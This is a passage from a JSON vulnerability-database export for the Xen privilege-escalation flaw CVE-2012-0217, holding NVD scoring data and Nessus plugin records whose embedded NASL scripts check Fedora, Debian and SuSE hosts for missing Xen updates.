Systems with AMD or ARM-based CPUs are not affected by this vulnerability.'", "edition": 6, "cvss3": {}, "published": "2012-06-12T22:55:00", "title": "CVE-2012-0217", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0217"], "modified": "2020-09-28T12:58:00", "cpe": ["cpe:/o:xen:xen:4.1.1", "cpe:/o:xen:xen:4.0.3", "cpe:/o:xen:xen:4.0.4", "cpe:/a:citrix:xenserver:6.0.2", "cpe:/a:citrix:xenserver:6.0", "cpe:/o:microsoft:windows_server_2003:*", "cpe:/o:xen:xen:4.0.1", "cpe:/o:netbsd:netbsd:6.0", "cpe:/o:xen:xen:4.0.2", "cpe:/o:xen:xen:4.1.0", "cpe:/o:sun:sunos:5.11", "cpe:/o:xen:xen:4.0.0", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_xp:*", "cpe:/o:xen:xen:4.1.2", "cpe:/o:freebsd:freebsd:9.0", "cpe:/o:joyent:smartos:20120614", "cpe:/o:microsoft:windows_7:*", "cpe:/o:illumos:illumos:r13723"], "id": "CVE-2012-0217", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0217", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:freebsd:freebsd:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:citrix:xenserver:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:x64:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:sp3:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:*:x64:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2003:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:*:x64:*:*:*:*:*", 
"cpe:2.3:o:illumos:illumos:r13723:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:o:sun:sunos:5.11:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:citrix:xenserver:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:xen:xen:4.0.4:*:*:*:*:*:*:*", "cpe:2.3:o:joyent:smartos:20120614:*:*:*:*:*:*:*", "cpe:2.3:o:netbsd:netbsd:6.0:beta:*:*:*:*:*:*"]}], "nessus": [{"lastseen": "2021-01-12T10:10:43", "description": "make pygrub cope better with big files from guest (#818412\nCVE-2012-2625), 64-bit PV guest privilege escalation vulnerability\n[CVE-2012-0217], guest denial of service on syscall/sysenter exception\ngeneration [CVE-2012-0218], PV guest host Denial of Service\n[CVE-2012-2934]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 11, "published": "2012-06-26T00:00:00", "title": "Fedora 16 : xen-4.1.2-8.fc16 (2012-9399)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934", "CVE-2012-2625"], "modified": "2012-06-26T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:xen", "cpe:/o:fedoraproject:fedora:16"], "id": "FEDORA_2012-9399.NASL", "href": "https://www.tenable.com/plugins/nessus/59693", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-9399.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59693);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_xref(name:\"FEDORA\", value:\"2012-9399\");\n\n 
script_name(english:\"Fedora 16 : xen-4.1.2-8.fc16 (2012-9399)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"make pygrub cope better with big files from guest (#818412\nCVE-2012-2625), 64-bit PV guest privilege escalation vulnerability\n[CVE-2012-0217], guest denial of service on syscall/sysenter exception\ngeneration [CVE-2012-0218], PV guest host Denial of Service\n[CVE-2012-2934]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-June/082754.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f18b6bbe\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected xen package.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", 
\"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"xen-4.1.2-8.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:10:43", "description": "make pygrub cope better with big files from guest (#818412\nCVE-2012-2625), 64-bit PV guest privilege escalation vulnerability\n[CVE-2012-0217], guest denial of service on syscall/sysenter exception\ngeneration [CVE-2012-0218], PV guest host Denial of Service\n[CVE-2012-2934]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 11, "published": "2012-06-26T00:00:00", "title": "Fedora 15 : xen-4.1.2-8.fc15 (2012-9430)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934", "CVE-2012-2625"], "modified": "2012-06-26T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:xen", "cpe:/o:fedoraproject:fedora:15"], "id": "FEDORA_2012-9430.NASL", "href": "https://www.tenable.com/plugins/nessus/59696", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-9430.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59696);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_xref(name:\"FEDORA\", value:\"2012-9430\");\n\n script_name(english:\"Fedora 15 : xen-4.1.2-8.fc15 (2012-9430)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"make pygrub cope better with big files from guest (#818412\nCVE-2012-2625), 64-bit PV guest privilege escalation vulnerability\n[CVE-2012-0217], guest denial of service on syscall/sysenter exception\ngeneration [CVE-2012-0218], PV guest host Denial of Service\n[CVE-2012-2934]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-June/082752.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ebc2ae1d\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected xen package.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:15\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^15([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 15.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC15\", reference:\"xen-4.1.2-8.fc15\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:10:43", "description": "64-bit PV guest privilege escalation vulnerability [CVE-2012-0217],\nguest denial of service on syscall/sysenter exception generation\n[CVE-2012-0218], PV guest host Denial of Service [CVE-2012-2934]\nEnable xenconsoled by default under systemd, adjust xend.service\nsystemd file to avoid selinux problems\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 11, "published": "2012-06-26T00:00:00", "title": "Fedora 17 : xen-4.1.2-20.fc17 (2012-9386)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"], "modified": "2012-06-26T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:17", "p-cpe:/a:fedoraproject:fedora:xen"], "id": "FEDORA_2012-9386.NASL", "href": "https://www.tenable.com/plugins/nessus/59692", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-9386.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59692);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_xref(name:\"FEDORA\", value:\"2012-9386\");\n\n script_name(english:\"Fedora 17 : xen-4.1.2-20.fc17 (2012-9386)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"64-bit PV guest privilege escalation vulnerability [CVE-2012-0217],\nguest denial of service on syscall/sysenter exception generation\n[CVE-2012-0218], PV guest host Denial of Service [CVE-2012-2934]\nEnable xenconsoled by default under systemd, adjust xend.service\nsystemd file to avoid selinux problems\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=829732\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-June/082824.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c5a16806\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected xen package.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"xen-4.1.2-20.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T09:47:32", "description": "Several vulnerabilities were discovered in Xen, a hypervisor.\n\n - CVE-2012-0217\n Xen does not properly handle uncanonical return\n addresses on Intel amd64 CPUs, allowing amd64 PV guests\n to elevate to hypervisor privileges. 
AMD processors, HVM\n and i386 guests are not affected.\n\n - CVE-2012-0218\n Xen does not properly handle SYSCALL and SYSENTER\n instructions in PV guests, allowing unprivileged users\n inside a guest system to crash the guest system.\n\n - CVE-2012-2934\n Xen does not detect old AMD CPUs affected by AMD Erratum\n #121.\n\nFor CVE-2012-2934, Xen refuses to start domUs on affected systems\nunless the 'allow_unsafe' option is passed.", "edition": 18, "published": "2012-06-29T00:00:00", "title": "Debian DSA-2501-1 : xen - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"], "modified": "2012-06-29T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:6.0", "p-cpe:/a:debian:debian_linux:xen"], "id": "DEBIAN_DSA-2501.NASL", "href": "https://www.tenable.com/plugins/nessus/59779", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2501. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59779);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\");\n script_bugtraq_id(53856, 53955, 53961);\n script_xref(name:\"DSA\", value:\"2501\");\n\n script_name(english:\"Debian DSA-2501-1 : xen - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities were discovered in Xen, a hypervisor.\n\n - CVE-2012-0217\n Xen does not properly handle uncanonical return\n addresses on Intel amd64 CPUs, allowing amd64 PV guests\n to elevate to hypervisor privileges. 
AMD processors, HVM\n and i386 guests are not affected.\n\n - CVE-2012-0218\n Xen does not properly handle SYSCALL and SYSENTER\n instructions in PV guests, allowing unprivileged users\n inside a guest system to crash the guest system.\n\n - CVE-2012-2934\n Xen does not detect old AMD CPUs affected by AMD Erratum\n #121.\n\nFor CVE-2012-2934, Xen refuses to start domUs on affected systems\nunless the 'allow_unsafe' option is passed.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2012-0217\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2012-0218\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2012-2934\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2012-2934\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/xen\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2012/dsa-2501\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the xen packages.\n\nFor the stable distribution (squeeze), these problems have been fixed\nin version 4.0.1-5.2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'FreeBSD Intel SYSRET Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", 
value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"libxen-dev\", reference:\"4.0.1-5.2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libxenstore3.0\", reference:\"4.0.1-5.2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"xen-docs-4.0\", reference:\"4.0.1-5.2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"xen-hypervisor-4.0-amd64\", reference:\"4.0.1-5.2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"xen-hypervisor-4.0-i386\", reference:\"4.0.1-5.2\")) flag++;\nif (deb_check(release:\"6.0\", 
prefix:\"xen-utils-4.0\", reference:\"4.0.1-5.2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"xenstore-utils\", reference:\"4.0.1-5.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T14:42:00", "description": "Three security issues were found in XEN.\n\nTwo security issues are fixed by this update :\n\n - Due to incorrect fault handling in the XEN hypervisor it\n was possible for a XEN guest domain administrator to\n execute code in the XEN host environment.\n (CVE-2012-0217)\n\n - Also a guest user could crash the guest XEN kernel due\n to a protection fault bounce. (CVE-2012-0218)\n\nThe third fix is changing the Xen behaviour on certain hardware :\n\n - The issue is a denial of service issue on older pre-SVM\n AMD CPUs (AMD Erratum 121). AMD Erratum #121 is\n described in 'Revision Guide for AMD Athlon 64 and AMD\n Opteron Processors':\n http://support.amd.com/us/Processor_TechDocs/25759.pdf.\n (CVE-2012-2934)\n\n The following 130nm and 90nm (DDR1-only) AMD processors\n are subject to this erratum :\n\n - First-generation AMD-Opteron(tm) single and dual core\n processors in either 939 or 940 packages :\n\n - AMD Opteron(tm) 100-Series Processors\n\n - AMD Opteron(tm) 200-Series Processors\n\n - AMD Opteron(tm) 800-Series Processors\n\n - AMD Athlon(tm) processors in either 754, 939 or 940\n packages\n\n - AMD Sempron(tm) processor in either 754 or 939 packages\n\n - AMD Turion(tm) Mobile Technology in 754 package\n\n This issue does not affect Intel processors.\n\n The impact of this flaw is that a malicious PV guest\n user can halt the host system.\n\n As this is a hardware flaw, it is not fixable except by\n upgrading your hardware to a newer revision, or not\n allowing untrusted 64-bit guest systems.\n\n The patch changes the 
behaviour of the host system\n booting, which makes it unable to create guest machines\n until a specific boot option is set.\n\n There is a new XEN boot option 'allow_unsafe' for GRUB\n which allows the host to start guests again.\n\n This is added to /boot/grub/menu.lst in the line looking\n like this :\n\n kernel /boot/xen.gz .... allow_unsafe\n\n Note: .... in this example represents the existing boot\n options for the host.", "edition": 19, "published": "2013-01-25T00:00:00", "title": "SuSE 11.1 Security Update : Xen (SAT Patch Number 6399)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"], "modified": "2013-01-25T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:xen-tools", "p-cpe:/a:novell:suse_linux:11:xen-tools-domU", "p-cpe:/a:novell:suse_linux:11:xen-kmp-trace", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:xen", "p-cpe:/a:novell:suse_linux:11:xen-doc-pdf", "p-cpe:/a:novell:suse_linux:11:xen-doc-html", "p-cpe:/a:novell:suse_linux:11:xen-kmp-pae", "p-cpe:/a:novell:suse_linux:11:xen-libs", "p-cpe:/a:novell:suse_linux:11:xen-kmp-default"], "id": "SUSE_11_XEN-201206-120606.NASL", "href": "https://www.tenable.com/plugins/nessus/64233", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. 
The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64233);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\");\n\n script_name(english:\"SuSE 11.1 Security Update : Xen (SAT Patch Number 6399)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Three security issues were found in XEN.\n\nTwo security issues are fixed by this update :\n\n - Due to incorrect fault handling in the XEN hypervisor it\n was possible for a XEN guest domain administrator to\n execute code in the XEN host environment.\n (CVE-2012-0217)\n\n - Also a guest user could crash the guest XEN kernel due\n to a protection fault bounce. The third fix is changing\n the Xen behaviour on certain hardware:. (CVE-2012-0218)\n\n - The issue is a denial of service issue on older pre-SVM\n AMD CPUs (AMD Erratum 121). 
AMD Erratum #121 is\n described in 'Revision Guide for AMD Athlon 64 and AMD\n Opteron Processors':\n http://support.amd.com/us/Processor_TechDocs/25759.pdf.\n (CVE-2012-2934)\n\n The following 130nm and 90nm (DDR1-only) AMD processors\n are subject to this erratum :\n\n - First-generation AMD-Opteron(tm) single and dual core\n processors in either 939 or 940 packages :\n\n - AMD Opteron(tm) 100-Series Processors\n\n - AMD Opteron(tm) 200-Series Processors\n\n - AMD Opteron(tm) 800-Series Processors\n\n - AMD Athlon(tm) processors in either 754, 939 or 940\n packages\n\n - AMD Sempron(tm) processor in either 754 or 939 packages\n\n - AMD Turion(tm) Mobile Technology in 754 package This\n issue does not effect Intel processors.\n\n The impact of this flaw is that a malicious PV guest\n user can halt the host system.\n\n As this is a hardware flaw, it is not fixable except by\n upgrading your hardware to a newer revision, or not\n allowing untrusted 64bit guestsystems.\n\n The patch changes the behaviour of the host system\n booting, which makes it unable to create guest machines\n until a specific boot option is set.\n\n There is a new XEN boot option 